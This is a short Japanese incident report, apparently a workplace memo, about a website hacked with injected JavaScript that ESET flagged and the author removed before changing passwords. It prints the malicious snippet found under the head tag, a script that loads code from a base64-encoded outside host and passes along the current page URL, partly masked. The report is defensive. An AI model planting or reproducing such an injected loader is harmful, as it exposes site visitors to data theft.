お疲れ様です
今回はハッキングされJSを埋め込まれた件の報告です
■状況
特定の環境でwebサイトを開くと警告がでる
IEで確認できたがクロームやFFでは確認できない
セキュリティソフト「ESET」が「検出された脅威」としてサイトアクセスを遮断する
■調査
head直下に心当たりのないスクリプトを発見
<s*cript language=”javascript”>var img = document.createElement(‘script’);img.setAttribute(‘src’, window.atob(“Ly9hc*****************zP2k9”) + window.location.href + window.atob(“JnIyPQ==”) + “f9be7**********902a7966676”);document.head.appendChild(img);</s*cript>
こちらにより何らかの情報を抜き出し送信する模様
削除・パスワード変更して対応
■参考URL※中国サイト
https://ssorc.tw/8553/wordpress-%E7%B6%B2%E7%AB%99%E8%A2%AB%E6%B3%A8%E5%85%A5%E6%83%A1%E6%84%8F-js%EF%BC%8C%E4%B8%A6%E7%AB%8A%E5%8F%96-woocommerce-%E4%BF%A1%E7%94%A8%E5%8D%A1%E8%B3%87%E6%96%99/
